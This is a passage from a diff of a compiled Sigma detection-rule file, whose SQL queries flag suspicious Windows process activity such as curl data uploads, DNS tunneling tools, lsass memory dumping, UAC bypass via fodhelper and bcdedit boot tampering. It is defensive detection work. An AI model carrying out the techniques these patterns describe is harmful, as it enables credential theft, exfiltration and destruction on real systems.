"proc_creation_win_mshta_lethalhta_technique.yml" + "filename": "proc_creation_win_hktl_zipexec.yml" }, { - "title": "Suspicious Schtasks Schedule Types", - "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "title": "Cmd.EXE Missing Space Characters Execution Anomaly", + "id": "a16980c2-0c56-4de0-9a79-17971979efdd", "status": "experimental", - "description": "Detects scheduled task creations or modification on a suspicious schedule type", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1053.005" - ], - "falsepositives": [ - "Legitimate processes that run at logon. Filter according to your environment" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_schtasks_schedule_type.yml" - }, - { - "title": "DNS Exfiltration and Tunneling Tools Execution", - "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", - "status": "test", - "description": "Well-known DNS Exfiltration tools execution", - "author": "Daniil Yugoslavskiy, oscd.community", - "tags": [ - "attack.exfiltration", - "attack.t1048.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1132.001" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iodine.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnscat2%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' 
ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" ], - "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" + "filename": "proc_creation_win_cmd_no_space_execution.yml" }, { - "title": "New Generic Credentials Added Via Cmdkey.EXE", - "id": "b1ec66c6-f4d1-4b5c-96dd-af28ccae7727", - "status": "experimental", - "description": "Detects usage of cmdkey to add generic credentials. As an example, this has to be used before connecting to an RDP session via command line interface.", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "ConvertTo-SecureString Cmdlet Usage Via CommandLine", + "id": "74403157-20f5-415d-89a7-c505779585cf", + "status": "test", + "description": "Detects usage of the \"ConvertTo-SecureString\" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ - "attack.credential_access", - "attack.t1003.005" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage for administration purposes" + "Legitimate use to pass password to different powershell commands" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /g%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%ConvertTo-SecureString%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmdkey_adding_generic_creds.yml" + "filename": 
"proc_creation_win_powershell_cmdline_convertto_securestring.yml" }, { - "title": "File With Suspicious Extension Downloaded Via Bitsadmin", - "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "title": "Suspicious Scheduled Task Creation via Masqueraded XML File", + "id": "dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a scheduled task using the \"-XML\" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence", + "author": "Swachchhanda Shrawan Poudel, Elastic (idea)", "tags": [ "attack.defense_evasion", "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1036.005", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR 
CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/create%' ESCAPE '\\' OR CommandLine LIKE '%-create%' ESCAPE '\\') AND (CommandLine LIKE '%/xml%' ESCAPE '\\' OR CommandLine LIKE '%-xml%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%.xml%' ESCAPE '\\') OR (IntegrityLevel = 'System') OR (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%:\\\\WINDOWS\\\\Installer\\\\MSI%' ESCAPE '\\' AND ParentCommandLine LIKE '%.tmp,zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\'))) AND NOT (((ParentImage LIKE '%:\\\\ProgramData\\\\OEM\\\\UpgradeTool\\\\CareCenter\\_%\\\\BUnzip\\\\Setup\\_msi.exe' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files\\\\Axis Communications\\\\AXIS Camera Station\\\\SetupActions.exe' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files\\\\Axis Communications\\\\AXIS Device Manager\\\\AdmSetupActions.exe' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files (x86)\\\\Zemana\\\\AntiMalware\\\\AntiMalware.exe' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files\\\\Dell\\\\SupportAssist\\\\pcdrcui.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" + "filename": "proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml" }, { - "title": "Suspicious Process Start Locations", - "id": 
"15b75071-74cc-47e0-b4c6-b43744a62a2b", + "title": "Suspicious XOR Encoded PowerShell Command", + "id": "bb780e0c-16cf-4383-8383-1e5471db6cf9", "status": "test", - "description": "Detects suspicious process run from unusual locations", - "author": "juju4, Jonhnathan Ribeiro, oscd.community", + "description": "Detects presence of a potentially xor encoded powershell command", + "author": "Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1036", - "car.2013-05-002" + "attack.execution", + "attack.t1059.001", + "attack.t1140", + "attack.t1027" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR Image LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6') AND CommandLine LIKE '%bxor%' ESCAPE '\\' AND (CommandLine LIKE '%ForEach%' ESCAPE '\\' OR CommandLine LIKE '%for(%' ESCAPE '\\' OR CommandLine LIKE '%for %' ESCAPE '\\' 
OR CommandLine LIKE '%-join %' ESCAPE '\\' OR CommandLine LIKE '%-join''%' ESCAPE '\\' OR CommandLine LIKE '%-join\"%' ESCAPE '\\' OR CommandLine LIKE '%-join`%' ESCAPE '\\' OR CommandLine LIKE '%::Join%' ESCAPE '\\' OR CommandLine LIKE '%[char]%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_run_locations.yml" + "filename": "proc_creation_win_powershell_xor_commandline.yml" }, { - "title": "Remote File Download via Desktopimgdownldr Utility", - "id": "214641c2-c579-4ecb-8427-0cf19df6842e", - "status": "experimental", - "description": "Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", - "author": "Tim Rauch", + "title": "Potential Data Exfiltration Via Curl.EXE", + "id": "00bca14a-df4e-4649-9054-3f2aa676bc04", + "status": "test", + "description": "Detects the execution of the \"curl\" process with \"upload\" flags. Which might indicate potential data exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", + "attack.exfiltration", + "attack.t1567", "attack.t1105" ], "falsepositives": [ - "Unknown" + "Scripts created by developers and admins" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND CommandLine LIKE '%/lockscreenurl:http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -F %' ESCAPE '\\' OR CommandLine LIKE '% --form%' ESCAPE '\\' OR CommandLine LIKE '% -T %' ESCAPE '\\' OR CommandLine LIKE '% --upload-file %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\' OR 
CommandLine LIKE '% --data-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_desktopimgdownldr_remote_file_download.yml" + "filename": "proc_creation_win_curl_fileupload.yml" }, { - "title": "Logon Scripts (UserInitMprLogonScript)", - "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "title": "Bypass UAC via Fodhelper.exe", + "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", "status": "test", - "description": "Detects creation or execution of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", + "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ - "attack.t1037.001", - "attack.persistence" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Legitimate use of fodhelper.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\proquota.exe' ESCAPE '\\' OR Image LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_persistence_userinitmprlogonscript.yml" + "filename": "proc_creation_win_uac_bypass_fodhelper.yml" }, { - "title": "VMToolsd Suspicious Child Process", - "id": "5687f942-867b-4578-ade7-1e341c46e99a", - "status": 
"experimental", - "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", - "author": "behops, Bhabesh Raj", + "title": "Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE", + "id": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", + "status": "test", + "description": "Detects potential malicious and unauthorized usage of bcdedit.exe", + "author": "@neu5ron", "tags": [ - "attack.execution", + "attack.defense_evasion", + "attack.t1070", "attack.persistence", - "attack.t1059" - ], - "falsepositives": [ - "Legitimate use by administrator" + "attack.t1542.003" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND (CommandLine LIKE '%delete%' ESCAPE '\\' OR CommandLine LIKE '%deletevalue%' ESCAPE '\\' OR CommandLine LIKE '%import%' ESCAPE '\\' OR CommandLine LIKE 
'%safeboot%' ESCAPE '\\' OR CommandLine LIKE '%network%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" + "filename": "proc_creation_win_bcdedit_susp_execution.yml" }, { - "title": "Wusa Extracting Cab Files From Suspicious Paths", - "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", + "title": "Potential Raspberry Robin Dot Ending File", + "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", "status": "experimental", - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", + "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution" 
@@ -17437,3634 +17330,3802 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" ], - "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" + "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" }, { - "title": "Service DACL Abuse To Hide Services Via Sc.EXE", - "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", - "status": "experimental", - "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", - "author": "Andreas Hunkeler (@Karneades)", + "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", + "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "status": "test", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" + "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" }, { - "title": "Suspicious Rundll32 Execution With Image Extension", - "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", - "status": "experimental", - "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", - "author": "Hieu Tran", + "title": "Invoke-Obfuscation Via Use Clip", + "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", + "status": "test", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' 
ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Remote Access Tool - GoToAssist Execution", - "id": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", - "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Boot Configuration Tampering Via Bcdedit.EXE", + "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", + "status": "stable", + "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate use" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'GoTo Opener' OR Product = 'GoTo Opener' OR Company = 'LogMeIn, Inc.'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_gotoopener.yml" + "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" }, { - "title": "HackTool - XORDump Execution", - "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", + "title": "PUA - RunXCmd Execution", + "id": "93199800-b52a-4dec-b762-75212c196542", "status": "test", - "description": "Detects suspicious use of XORDump process memory dumping utility", + "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Another tool that uses the command line switches of XORdump" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% 
-m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_xordump.yml" + "filename": "proc_creation_win_pua_runxcmd.yml" }, { - "title": "Suspicious Csc.exe Source File Folder", - "id": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", + "title": "Suspicious Kernel Dump Using Dtrace", + "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", "status": "test", - "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. AppData)", + "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1027.004" - ], "falsepositives": [ - "Legitimate software from program files - 